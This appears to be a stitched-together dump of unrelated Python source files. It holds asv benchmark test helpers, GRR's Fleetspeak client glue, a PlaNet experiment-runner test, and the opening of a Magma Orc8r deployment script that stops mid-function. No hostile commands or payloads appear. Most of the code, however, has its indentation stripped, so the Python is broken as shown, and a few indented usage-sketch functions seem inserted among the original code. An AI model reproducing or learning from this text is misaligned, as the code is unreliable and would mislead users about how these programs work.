WAIT_TIME = 20.0
class DummyLock(object):
def __init__(self, filename):
pass
def acquire(self, timeout=None):
pass
def release(self):
pass
try:
from lockfile import LockFile
except ImportError:
LockFile = DummyLock
@contextmanager
def locked_cache_dir(config, cache_key, timeout=900, tag=None):
if LockFile is DummyLock:
cache_key = cache_key + os.environ.get('PYTEST_XDIST_WORKER', '')
base_dir = config.cache.makedir(cache_key)
lockfile = join(six.text_type(base_dir), 'lock')
cache_dir = join(six.text_type(base_dir), 'cache')
lock = LockFile(lockfile)
lock.acquire(timeout=timeout)
try:
# Clear cache dir contents if it was generated with different
# asv version
tag_fn = join(six.text_type(base_dir), 'tag.json')
tag_content = [asv.__version__, repr(tag)]
if os.path.isdir(cache_dir):
try:
if util.load_json(tag_fn) != tag_content:
raise ValueError()
except (IOError, ValueError, util.UserError):
shutil.rmtree(cache_dir)
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
yield cache_dir
util.write_json(tag_fn, tag_content)
finally:
lock.release()
def run_asv(*argv, **kwargs):
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
return args.func(args, **kwargs)
def run_asv_with_conf(conf, *argv, **kwargs):
assert isinstance(conf, config.Config)
parser, subparsers = commands.make_argparser()
args = parser.parse_args(argv)
if sys.version_info[0] >= 3:
cls = args.func.__self__
else:
cls = args.func.im_self
return cls.run_from_conf_args(conf, args, **kwargs)
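# Hedged usage sketch (not part of the original helpers): both wrappers accept
# asv CLI arguments; `conf` is assumed to be an asv config.Config instance.
def _example_run_asv(conf):
    run_asv('machine', '--yes')
    return run_asv_with_conf(conf, 'run', '--quick', '--show-stderr')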
# These classes are defined here, rather than using asv/plugins/git.py
# and asv/plugins/mercurial.py since here we need to perform write
# operations to the repository, and the others should be read-only for
# safety.
class Git(object):
def __init__(self, path):
self.path = abspath(path)
self._git = util.which('git')
self._fake_date = datetime.datetime.now()
def run_git(self, args, chdir=True, **kwargs):
if chdir:
cwd = self.path
else:
cwd = None
kwargs['cwd'] = cwd
return util.check_output(
[self._git] + args, **kwargs)
def init(self):
self.run_git(['init'])
self.run_git(['config', 'user.email', 'robot@asv'])
self.run_git(['config', 'user.name', 'Robotic Swallow'])
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
self.run_git(['commit', '--date', date.isoformat(),
'-m', message])
def tag(self, number):
self.run_git(['tag', '-a', '-m', 'Tag {0}'.format(number),
'tag{0}'.format(number)])
def add(self, filename):
self.run_git(['add', relpath(filename, self.path)])
def checkout(self, branch_name, start_commit=None):
args = ["checkout"]
if start_commit is not None:
args.extend(["-b", branch_name, start_commit])
else:
args.append(branch_name)
self.run_git(args)
def merge(self, branch_name, commit_message=None):
self.run_git(["merge", "--no-ff", "--no-commit", "-X", "theirs", branch_name])
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
return self.run_git(['rev-parse', name]).strip()
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "master"
return [x.strip() for x in self.run_git(['rev-list', branch]).splitlines()
if x.strip()]
def get_commit_message(self, commit_hash):
return self.run_git(["log", "-n", "1", "--format=%s", commit_hash]).strip()
_hg_config = """
[ui]
username = Robotic Swallow <robot@asv>
"""
class Hg(object):
encoding = 'utf-8'
def __init__(self, path):
self._fake_date = datetime.datetime.now()
self.path = abspath(path)
self._repo = None
def __del__(self):
if self._repo is not None:
self._repo.close()
self._repo = None
def init(self):
hglib.init(self.path)
with io.open(join(self.path, '.hg', 'hgrc'), 'w', encoding="utf-8") as fd:
fd.write(_hg_config)
self._repo = hglib.open(self.path.encode(sys.getfilesystemencoding()),
encoding=self.encoding)
def commit(self, message, date=None):
if date is None:
self._fake_date += datetime.timedelta(seconds=1)
date = self._fake_date
date = "{0} 0".format(util.datetime_to_timestamp(date))
self._repo.commit(message.encode(self.encoding),
date=date.encode(self.encoding))
def tag(self, number):
self._fake_date += datetime.timedelta(seconds=1)
date = "{0} 0".format(util.datetime_to_timestamp(self._fake_date))
self._repo.tag(
['tag{0}'.format(number).encode(self.encoding)],
message="Tag {0}".format(number).encode(self.encoding),
date=date.encode(self.encoding))
def add(self, filename):
self._repo.add([filename.encode(sys.getfilesystemencoding())])
def checkout(self, branch_name, start_commit=None):
if start_commit is not None:
self._repo.update(start_commit.encode(self.encoding))
self._repo.branch(branch_name.encode(self.encoding))
else:
self._repo.update(branch_name.encode(self.encoding))
def merge(self, branch_name, commit_message=None):
self._repo.merge(branch_name.encode(self.encoding),
tool=b"internal:other")
if commit_message is None:
commit_message = "Merge {0}".format(branch_name)
self.commit(commit_message)
def get_hash(self, name):
log = self._repo.log(name.encode(self.encoding), limit=1)
if log:
return log[0][1].decode(self.encoding)
return None
def get_branch_hashes(self, branch=None):
if branch is None:
branch = "default"
log = self._repo.log('sort(ancestors({0}), -rev)'.format(branch).encode(self.encoding))
return [entry[1].decode(self.encoding) for entry in log]
def get_commit_message(self, commit_hash):
return self._repo.log(commit_hash.encode(self.encoding))[0].desc.decode(self.encoding)
def copy_template(src, dst, dvcs, values):
for root, dirs, files in os.walk(src):
for dir in dirs:
src_path = join(root, dir)
dst_path = join(dst, relpath(src_path, src))
if not isdir(dst_path):
os.makedirs(dst_path)
for file in files:
src_path = join(root, file)
dst_path = join(dst, relpath(src_path, src))
try:
with io.open(src_path, 'r', encoding='utf-8') as fd:
content = fd.read()
except UnicodeDecodeError:
# File is some sort of binary file... just copy it
# directly with no template substitution
with io.open(src_path, 'rb') as fd:
content = fd.read()
with io.open(dst_path, 'wb') as fd:
fd.write(content)
else:
content = content.format(**values)
with io.open(dst_path, 'w', encoding='utf-8') as fd:
fd.write(content)
dvcs.add(dst_path)
def generate_test_repo(tmpdir, values=[0], dvcs_type='git',
extra_branches=(), subdir=''):
"""
Generate a test repository
Parameters
----------
tmpdir
Repository directory
values : list
List of values to substitute in the template
dvcs_type : {'git', 'hg'}
What dvcs to use
extra_branches : list of (start_commit, branch_name, values)
Additional branches to generate in the repository.
For branch start commits, use relative references, e.g.,
the format 'master~10' or 'default~10' works both for Hg
and Git.
subdir
A relative subdirectory inside the repository to copy the
test project into.
Returns
-------
dvcs : Git or Hg
"""
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
project_path = os.path.join(dvcs_path, subdir)
if not os.path.exists(project_path):
os.makedirs(project_path)
for i, value in enumerate(values):
mapping = {
'version': i,
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}".format(i))
dvcs.tag(i)
if extra_branches:
for start_commit, branch_name, values in extra_branches:
dvcs.checkout(branch_name, start_commit)
for i, value in enumerate(values):
mapping = {
'version': "{0}".format(i),
'dummy_value': value
}
copy_template(template_path, project_path, dvcs, mapping)
dvcs.commit("Revision {0}.{1}".format(branch_name, i))
return dvcs
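# Illustrative usage sketch (not part of the original utilities): create a
# small throwaway git repository with one extra branch. The tmpdir path is a
# hypothetical placeholder.
def _example_generate_repo(tmpdir="/tmp/asv-test-repos"):
    dvcs = generate_test_repo(
        tmpdir, values=[1, 2, 3], dvcs_type='git',
        extra_branches=[('master~1', 'some-branch', [41, 42])])
    print(dvcs.path)
    print(dvcs.get_branch_hashes('some-branch')[:2])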
def generate_repo_from_ops(tmpdir, dvcs_type, operations):
if dvcs_type == 'git':
dvcs_cls = Git
elif dvcs_type == 'hg':
dvcs_cls = Hg
else:
raise ValueError("Unknown dvcs type {0}".format(dvcs_type))
template_path = join(dirname(__file__), 'test_repo_template')
if not os.path.isdir(tmpdir):
os.makedirs(tmpdir)
dvcs_path = tempfile.mkdtemp(prefix='test_repo', dir=tmpdir)
dvcs = dvcs_cls(dvcs_path)
dvcs.init()
version = 0
for op in operations:
if op[0] == "commit":
copy_template(template_path, dvcs_path, dvcs, {
"version": version,
"dummy_value": op[1],
})
version += 1
dvcs.commit("Revision {0}".format(version), *op[2:])
elif op[0] == "checkout":
dvcs.checkout(*op[1:])
elif op[0] == "merge":
dvcs.merge(*op[1:])
else:
raise ValueError("Unknown dvcs operation {0}".format(op))
return dvcs
def generate_result_dir(tmpdir, dvcs, values, branches=None):
result_dir = join(tmpdir, "results")
os.makedirs(result_dir)
html_dir = join(tmpdir, "html")
machine_dir = join(result_dir, "tarzan")
os.makedirs(machine_dir)
if branches is None:
branches = [None]
conf = config.Config.from_json({
'results_dir': result_dir,
'html_dir': html_dir,
'repo': dvcs.path,
'project': 'asv',
'branches': branches or [None],
})
repo = get_repo(conf)
util.write_json(join(machine_dir, "machine.json"), {
'machine': 'tarzan',
'version': 1,
})
timestamp = datetime.datetime.utcnow()
benchmark_version = sha256(os.urandom(16)).hexdigest()
params = None
param_names = None
for commit, value in values.items():
if isinstance(value, dict):
params = value["params"]
result = Results({"machine": "tarzan"}, {}, commit,
repo.get_date_from_name(commit), "2.7", None)
value = runner.BenchmarkResult(
result=[value],
samples=[None],
number=[None],
errcode=0,
stderr='',
profile=None)
result.add_result({"name": "time_func", "version": benchmark_version, "params": []},
value, started_at=timestamp, ended_at=timestamp)
result.save(result_dir)
if params:
param_names = ["param{}".format(k) for k in range(len(params))]
util.write_json(join(result_dir, "benchmarks.json"), {
"time_func": {
"name": "time_func",
"params": params or [],
"param_names": param_names or [],
"version": benchmark_version,
}
}, api_version=2)
return conf
@pytest.fixture(scope="session")
def browser(request, pytestconfig):
"""
Fixture for Selenium WebDriver browser interface
"""
driver_str = pytestconfig.getoption('webdriver')
if driver_str == "None":
pytest.skip("No webdriver selected for tests (use --webdriver).")
# Evaluate the options
def FirefoxHeadless():
from selenium.webdriver.firefox.options import Options
options = Options()
options.add_argument("-headless")
return selenium.webdriver.Firefox(firefox_options=options)
def ChromeHeadless():
options = selenium.webdriver.ChromeOptions()
options.add_argument('headless')
return selenium.webdriver.Chrome(chrome_options=options)
ns = {}
six.exec_("import selenium.webdriver", ns)
six.exec_("from selenium.webdriver import *", ns)
ns['FirefoxHeadless'] = FirefoxHeadless
ns['ChromeHeadless'] = ChromeHeadless
create_driver = ns.get(driver_str, None)
if create_driver is None:
src = "def create_driver():\n"
src += textwrap.indent(driver_str, " ")
six.exec_(src, ns)
create_driver = ns['create_driver']
# Create the browser
browser = create_driver()
# Set timeouts
browser.set_page_load_timeout(WAIT_TIME)
browser.set_script_timeout(WAIT_TIME)
# Clean up on fixture finalization
def fin():
browser.quit()
request.addfinalizer(fin)
# Set default time to wait for AJAX requests to complete
browser.implicitly_wait(WAIT_TIME)
return browser
@contextmanager
def preview(base_path):
"""
Context manager for ASV preview web server. Gives the base URL to use.
Parameters
----------
base_path : str
Path to serve files from
"""
class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def translate_path(self, path):
# Don't serve from cwd, but from a different directory
path = SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, path)
path = os.path.join(base_path, os.path.relpath(path, os.getcwd()))
return util.long_path(path)
httpd, base_url = create_httpd(Handler)
def run():
try:
httpd.serve_forever()
except:
import traceback
traceback.print_exc()
return
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
try:
yield base_url
finally:
        # Stop must be run in a separate thread, because
        # httpd.shutdown blocks until serve_forever returns. We don't
        # want to block here, since in some environments problems may
        # arise when shutting down the server.
stopper = threading.Thread(target=httpd.shutdown)
stopper.daemon = True
stopper.start()
stopper.join(5.0)
def get_with_retry(browser, url):
for j in range(2):
try:
return browser.get(url)
except TimeoutException:
time.sleep(2)
return browser.get(url)
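# Hedged usage sketch (not part of the original utilities): serve a directory
# of generated HTML through the preview server and load it via the retrying
# helper. The html_dir path is a hypothetical placeholder.
def _example_preview(browser, html_dir="/tmp/asv-html"):
    with preview(html_dir) as base_url:
        get_with_retry(browser, base_url)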
@pytest.fixture
def dummy_packages(request, monkeypatch):
"""
Build dummy wheels for required packages and set PIP_FIND_LINKS + CONDARC
"""
to_build = [('asv_dummy_test_package_1', DUMMY1_VERSION)]
to_build += [('asv_dummy_test_package_2', ver) for ver in DUMMY2_VERSIONS]
tag = [PYTHON_VER1, PYTHON_VER2, to_build, HAS_CONDA]
with locked_cache_dir(request.config, "asv-wheels", timeout=900, tag=tag) as cache_dir:
wheel_dir = os.path.abspath(join(six.text_type(cache_dir), 'wheels'))
monkeypatch.setenv('PIP_FIND_LINKS', 'file://' + wheel_dir)
condarc = join(wheel_dir, 'condarc')
monkeypatch.setenv('CONDARC', condarc)
if os.path.isdir(wheel_dir):
return
tmpdir = join(six.text_type(cache_dir), "tmp")
if os.path.isdir(tmpdir):
shutil.rmtree(tmpdir)
os.makedirs(tmpdir)
try:
os.makedirs(wheel_dir)
_build_dummy_wheels(tmpdir, wheel_dir, to_build, build_conda=HAS_CONDA)
except:
shutil.rmtree(wheel_dir)
raise
# Conda packages were installed in a local channel
if not WIN:
wheel_dir_str = "file://{0}".format(wheel_dir)
else:
wheel_dir_str = wheel_dir
with open(condarc, 'w') as f:
f.write("channels:\n"
"- defaults\n"
"- {0}".format(wheel_dir_str))
def _build_dummy_wheels(tmpdir, wheel_dir, to_build, build_conda=False):
# Build fake wheels for testing
for name, version in to_build:
build_dir = join(tmpdir, name + '-' + version)
os.makedirs(build_dir)
with open(join(build_dir, 'setup.py'), 'w') as f:
f.write("from setuptools import setup; "
"setup(name='{name}', version='{version}', packages=['{name}'])"
"".format(name=name, version=version))
os.makedirs(join(build_dir, name))
with open(join(build_dir, name, '__init__.py'), 'w') as f:
f.write("__version__ = '{0}'".format(version))
subprocess.check_call([sys.executable, '-mpip', 'wheel',
'--build-option=--universal',
'-w', wheel_dir,
'.'],
cwd=build_dir)
if build_conda:
_build_dummy_conda_pkg(name, version, build_dir, wheel_dir)
def _build_dummy_conda_pkg(name, version, build_dir, dst):
# Build fake conda packages for testing
build_dir = os.path.abspath(build_dir)
with open(join(build_dir, 'meta.yaml'), 'w') as f:
f.write(textwrap.dedent("""\
package:
name: "{name}"
version: "{version}"
source:
path: {build_dir}
build:
number: 0
script: "python -m pip install . --no-deps --ignore-installed "
requirements:
host:
- pip
- python
run:
- python
about:
license: BSD
summary: Dummy test package
""".format(name=name,
version=version,
build_dir=util.shlex_quote(build_dir))))
conda = _find_conda()
for pyver in [PYTHON_VER1, PYTHON_VER2]:
subprocess.check_call([conda, 'build',
'--output-folder=' + dst,
'--no-anaconda-upload',
'--python=' + pyver,
'.'],
cwd=build_dir)
|
fleetspeak_client.py
|
#!/usr/bin/env python
"""Fleetspeak-facing client related functionality.
This module contains glue code necessary for Fleetspeak and the GRR client
to work together.
"""
import logging
import pdb
import platform
import queue
import struct
import threading
import time
from absl import flags
from grr_response_client import comms
from grr_response_client import communicator
from grr_response_core import config
from grr_response_core.lib import rdfvalue
from grr_response_core.lib.rdfvalues import flows as rdf_flows
from grr_response_core.lib.rdfvalues import protodict as rdf_protodict
from grr_response_proto import jobs_pb2
from fleetspeak.src.common.proto.fleetspeak import common_pb2 as fs_common_pb2
from fleetspeak.client_connector import connector as fs_client
# pyformat: disable
START_STRING = "Starting client."
# (see also /grr_response_client/comms.py)
# pyformat: enable
# Limit on the total size of GrrMessages to batch into a single
# PackedMessageList (before sending to Fleetspeak).
_MAX_MSG_LIST_BYTES = 1 << 20 # 1 MiB
# Maximum number of GrrMessages to put in one PackedMessageList.
_MAX_MSG_LIST_MSG_COUNT = 100
# Maximum size of annotations to add for a Fleetspeak message.
_MAX_ANNOTATIONS_BYTES = 3 << 10 # 3 KiB
_DATA_IDS_ANNOTATION_KEY = "data_ids"
class FatalError(Exception):
pass
class GRRFleetspeakClient(object):
"""A Fleetspeak enabled client implementation."""
# Only buffer at most ~100MB of data - the estimate comes from the Fleetspeak
# message size limit - Fleetspeak refuses to process messages larger than 2MB.
# This is a sanity safeguard against unlimited memory consumption.
_SENDER_QUEUE_MAXSIZE = 50
def __init__(self):
self._fs = fs_client.FleetspeakConnection(
version=config.CONFIG["Source.version_string"])
self._sender_queue = queue.Queue(
maxsize=GRRFleetspeakClient._SENDER_QUEUE_MAXSIZE)
self._threads = {}
if platform.system() == "Windows":
internal_nanny_monitoring = False
heart_beat_cb = self._fs.Heartbeat
else:
# TODO(amoser): Once the Fleetspeak nanny functionality is
# production ready, change this to
# internal_nanny_monitoring=False
# heart_beat_cb=self._fs.Heartbeat
internal_nanny_monitoring = True
heart_beat_cb = None
# The client worker does all the real work here.
# In particular, we delegate sending messages to Fleetspeak to a separate
# threading.Thread here.
out_queue = _FleetspeakQueueForwarder(self._sender_queue)
worker = self._threads["Worker"] = comms.GRRClientWorker(
out_queue=out_queue,
heart_beat_cb=heart_beat_cb,
internal_nanny_monitoring=internal_nanny_monitoring,
client=self)
# TODO(user): this is an ugly way of passing the heartbeat callback to
# the queue. Refactor the heartbeat callback initialization logic so that
# this won't be needed.
out_queue.heart_beat_cb = worker.Heartbeat
self._threads["Foreman"] = self._CreateThread(self._ForemanOp)
self._threads["Sender"] = self._CreateThread(self._SendOp)
self._threads["Receiver"] = self._CreateThread(self._ReceiveOp)
def _CreateThread(self, loop_op):
thread = threading.Thread(target=self._RunInLoop, args=(loop_op,))
thread.daemon = True
return thread
def _RunInLoop(self, loop_op):
while True:
try:
loop_op()
except Exception as e:
logging.critical("Fatal error occurred:", exc_info=True)
if flags.FLAGS.pdb_post_mortem:
pdb.post_mortem()
# This will terminate execution in the current thread.
raise e
def FleetspeakEnabled(self):
return True
def Run(self):
"""The main run method of the client."""
for thread in self._threads.values():
thread.start()
logging.info(START_STRING)
while True:
dead_threads = [
tn for (tn, t) in self._threads.items() if not t.isAlive()
]
if dead_threads:
raise FatalError(
"These threads are dead: %r. Shutting down..." % dead_threads)
time.sleep(10)
def _ForemanOp(self):
"""Sends Foreman checks periodically."""
period = config.CONFIG["Client.foreman_check_frequency"]
self._threads["Worker"].SendReply(
rdf_protodict.DataBlob(),
session_id=rdfvalue.FlowSessionID(flow_name="Foreman"),
require_fastpoll=False)
time.sleep(period)
def _SendMessages(self, grr_msgs, background=False):
"""Sends a block of messages through Fleetspeak."""
message_list = rdf_flows.PackedMessageList()
communicator.Communicator.EncodeMessageList(
rdf_flows.MessageList(job=grr_msgs), message_list)
fs_msg = fs_common_pb2.Message(
message_type="MessageList",
destination=fs_common_pb2.Address(service_name="GRR"),
background=background)
fs_msg.data.Pack(message_list.AsPrimitiveProto())
for grr_msg in grr_msgs:
if (grr_msg.session_id is None or grr_msg.request_id is None or
grr_msg.response_id is None):
continue
# Place all ids in a single annotation, instead of having separate
# annotations for the flow-id, request-id and response-id. This reduces
# overall size of the annotations by half (~60 bytes to ~30 bytes).
annotation = fs_msg.annotations.entries.add()
annotation.key = _DATA_IDS_ANNOTATION_KEY
annotation.value = "%s:%d:%d" % (grr_msg.session_id.Basename(),
grr_msg.request_id, grr_msg.response_id)
if fs_msg.annotations.ByteSize() >= _MAX_ANNOTATIONS_BYTES:
break
try:
sent_bytes = self._fs.Send(fs_msg)
except (IOError, struct.error):
logging.critical("Broken local Fleetspeak connection (write end).")
raise
communicator.GRR_CLIENT_SENT_BYTES.Increment(sent_bytes)
def _SendOp(self):
"""Sends messages through Fleetspeak."""
msg = self._sender_queue.get()
msgs = []
background_msgs = []
if not msg.require_fastpoll:
background_msgs.append(msg)
else:
msgs.append(msg)
count = 1
size = len(msg.SerializeToBytes())
while count < _MAX_MSG_LIST_MSG_COUNT and size < _MAX_MSG_LIST_BYTES:
try:
msg = self._sender_queue.get(timeout=1)
if not msg.require_fastpoll:
background_msgs.append(msg)
else:
msgs.append(msg)
count += 1
size += len(msg.SerializeToBytes())
except queue.Empty:
break
if msgs:
self._SendMessages(msgs)
if background_msgs:
self._SendMessages(background_msgs, background=True)
def _ReceiveOp(self):
"""Receives a single message through Fleetspeak."""
try:
fs_msg, received_bytes = self._fs.Recv()
except (IOError, struct.error):
logging.critical("Broken local Fleetspeak connection (read end).")
raise
received_type = fs_msg.data.TypeName()
if not received_type.endswith("GrrMessage"):
raise ValueError(
"Unexpected proto type received through Fleetspeak: %r; expected "
"grr.GrrMessage." % received_type)
communicator.GRR_CLIENT_RECEIVED_BYTES.Increment(received_bytes)
grr_msg = rdf_flows.GrrMessage.FromSerializedBytes(fs_msg.data.value)
# Authentication is ensured by Fleetspeak.
grr_msg.auth_state = jobs_pb2.GrrMessage.AUTHENTICATED
self._threads["Worker"].QueueMessages([grr_msg])
class _FleetspeakQueueForwarder(object):
"""Ducktyped replacement for SizeLimitedQueue; forwards to _SenderThread."""
def __init__(self, sender_queue):
"""Constructor.
Args:
sender_queue: queue.Queue
"""
self._sender_queue = sender_queue
self.heart_beat_cb = lambda: None
def Put(self, grr_msg, block=True, timeout=None):
"""Places a message in the queue."""
if not block:
self._sender_queue.put(grr_msg, block=False)
else:
t0 = time.time()
while not timeout or (time.time() - t0 < timeout):
self.heart_beat_cb()
try:
self._sender_queue.put(grr_msg, timeout=1)
return
except queue.Full:
continue
raise queue.Full
def Get(self):
raise NotImplementedError("This implementation only supports input.")
def Size(self):
"""Returns the *approximate* size of the queue.
See: https://docs.python.org/2/library/queue.html#Queue.Queue.qsize
Returns:
int
"""
return self._sender_queue.qsize()
def Full(self):
return self._sender_queue.full()
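# Illustrative sketch (not part of the original module): the forwarder simply
# relays GrrMessages into the bounded sender queue, heart-beating while it
# waits for space when used in blocking mode.
def _example_forwarder():
  sender_queue = queue.Queue(maxsize=2)
  forwarder = _FleetspeakQueueForwarder(sender_queue)
  forwarder.Put(rdf_flows.GrrMessage(), block=False)
  print(forwarder.Size())  # approximately 1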
|
test_running.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import pickle
import threading
import time
import numpy as np
import tensorflow as tf
from planet.training import running
class TestExperiment(tf.test.TestCase):
def test_no_kills(self):
tf.logging.set_verbosity(tf.logging.INFO)
basedir = os.path.join(tf.test.get_temp_dir(), 'test_no_kills')
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_normal, args=(basedir, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/DONE'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/PING'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/started'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/resumed'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/failed'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/numbers'))
self.assertEqual(100, len(filepaths))
for filepath in filepaths:
with tf.gfile.GFile(filepath, 'rb') as file_:
self.assertEqual(10, len(pickle.load(file_)))
def test_dying_workers(self):
tf.logging.set_verbosity(tf.logging.INFO)
basedir = os.path.join(tf.test.get_temp_dir(), 'test_dying_workers')
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_dying, args=(basedir, 15, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
processes = []
for worker_name in range(20):
processes.append(threading.Thread(
target=_worker_normal, args=(basedir, str(worker_name))))
processes[-1].start()
for process in processes:
process.join()
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/DONE'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/PING'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/FAIL'))
self.assertEqual(0, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/started'))
self.assertEqual(100, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/resumed'))
self.assertEqual(20, len(filepaths))
filepaths = tf.gfile.Glob(os.path.join(basedir, '*/numbers'))
self.assertEqual(100, len(filepaths))
for filepath in filepaths:
with tf.gfile.GFile(filepath, 'rb') as file_:
self.assertEqual(10, len(pickle.load(file_)))
def _worker_normal(basedir, worker_name):
experiment = running.Experiment(
basedir, _process_fn, _start_fn, _resume_fn,
num_runs=100, worker_name=worker_name, ping_every=1.0)
for run in experiment:
for score in run:
pass
def _worker_dying(basedir, die_at_step, worker_name):
experiment = running.Experiment(
basedir, _process_fn, _start_fn, _resume_fn,
num_runs=100, worker_name=worker_name, ping_every=1.0)
step = 0
for run in experiment:
for score in run:
step += 1
if step >= die_at_step:
return
def _start_fn(logdir):
assert not tf.gfile.Exists(os.path.join(logdir, 'DONE'))
assert not tf.gfile.Exists(os.path.join(logdir, 'started'))
assert not tf.gfile.Exists(os.path.join(logdir, 'resumed'))
with tf.gfile.GFile(os.path.join(logdir, 'started'), 'w') as file_:
file_.write('\n')
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'wb') as file_:
pickle.dump([], file_)
return []
def _resume_fn(logdir):
assert not tf.gfile.Exists(os.path.join(logdir, 'DONE'))
assert tf.gfile.Exists(os.path.join(logdir, 'started'))
with tf.gfile.GFile(os.path.join(logdir, 'resumed'), 'w') as file_:
file_.write('\n')
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'rb') as file_:
numbers = pickle.load(file_)
if len(numbers) != 5:
raise Exception('Expected to be resumed in the middle for this test.')
return numbers
def _process_fn(logdir, numbers):
assert tf.gfile.Exists(os.path.join(logdir, 'started'))
while len(numbers) < 10:
number = np.random.uniform(0, 0.1)
time.sleep(number)
numbers.append(number)
with tf.gfile.GFile(os.path.join(logdir, 'numbers'), 'wb') as file_:
pickle.dump(numbers, file_)
yield number
if __name__ == '__main__':
tf.test.main()
|
MVC2_5G_Orc8r_deployment_script.py
|
#!/usr/bin/env python3
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import sys, getopt, shutil
import time, re, logging
import os, subprocess, fileinput
import webbrowser, socket
import threading, platform
#Initialize the lock
lock = threading.Lock()
#Dictionary to track whether k8s services are Running or not
k8s_obj_dict = {}
#Get the Current Working Directory
CWD = os.getcwd()
#Path for Orc8r temporary files
ORC8R_TEMP_DIR = '/tmp/Orc8r_temp'
INFRA_SOFTWARE_VER = os.path.join(ORC8R_TEMP_DIR, 'infra_software_version.txt')
K8S_GET_DEP = os.path.join(ORC8R_TEMP_DIR, 'k8s_get_deployment.txt')
K8S_GET_SVC = os.path.join(ORC8R_TEMP_DIR, 'k8s_get_service.txt')
#Path for Orc8r VM temporary files
ORC8R_VM_DIR = '/tmp/Orc8r_vm'
K8S_GET_OBJ = os.path.join(ORC8R_VM_DIR, 'k8s_get_objects.txt')
#Path for Templates directory where all source yaml files present
TEMPLATES_DIR = os.path.join(CWD, '../helm/templates')
#Debian-9-openstack-amd64.qcow2 file
DEBIAN_QCOW2_FILE = os.path.join(TEMPLATES_DIR, 'debian-9-openstack-amd64.qcow2')
#Path for multus-cni home directory
MULTUS_DIR = os.path.join(TEMPLATES_DIR, 'multus-cni')
class Error(Exception):
"""Base class for other exceptions"""
pass
class NotInstalled(Error):
"""Raised when Installation not done"""
pass
def Code(type):
switcher = {
'WARNING' : 93,
'FAIL' : 91,
'GREEN' : 92,
'BLUE' : 94,
'ULINE' : 4,
'BLD' : 1,
'HDR' : 95,
}
return switcher.get(type)
#Print messages with colours on console
def myprint(type, msg):
code = Code(type)
message = '\033[%sm \n %s \n \033[0m' % (code, msg)
print(message)
#Executing shell commands via subprocess.Popen() method
def execute_cmd(cmd):
process = subprocess.Popen(cmd, shell=True)
os.waitpid(process.pid, 0)
#Check pre-requisites: kubeadm and helm should be installed before we run this script
def check_pre_requisite():
    #Setting logging basic configurations like severity level=DEBUG, timestamp, function name, line number
logging.basicConfig(
format='[%(asctime)s %(levelname)s %(name)s:%(funcName)s:%(lineno)d] %(message)s',
level = logging.DEBUG)
uname = platform.uname()
logging.debug('Operating System : %s' % uname[0])
logging.debug('Host name : %s' % uname[1])
if os.path.exists(ORC8R_TEMP_DIR):
shutil.rmtree(ORC8R_TEMP_DIR)
os.mkdir(ORC8R_TEMP_DIR)
cmd = 'cat /etc/os-release > %s' % INFRA_SOFTWARE_VER
execute_cmd(cmd)
with open(INFRA_SOFTWARE_VER) as fop1:
all_lines = fop1.readlines()
for distro_name in all_lines:
if "PRETTY_NAME" in distro_name:
logging.debug("Distro name : %s" % distro_name.split('=')[1])
logging.debug('Kernel version : %s' % uname[2])
logging.debug('Architecture : %s' % uname[4])
logging.debug('python version is : %s' % sys.version)
try:
cmd = 'kubeadm version > %s' % INFRA_SOFTWARE_VER
out = os.system(cmd)
if out == 0:
myprint("GREEN", "kubeadm installed : YES")
with open(INFRA_SOFTWARE_VER) as fop2:
kubeadm_version = fop2.readline().split(' ')
logging.debug("%s %s %s" % (kubeadm_version[2].split('{')[1], kubeadm_version[3], kubeadm_version[4]))
else:
raise NotInstalled
except NotInstalled:
print("kudeadm is not installed")
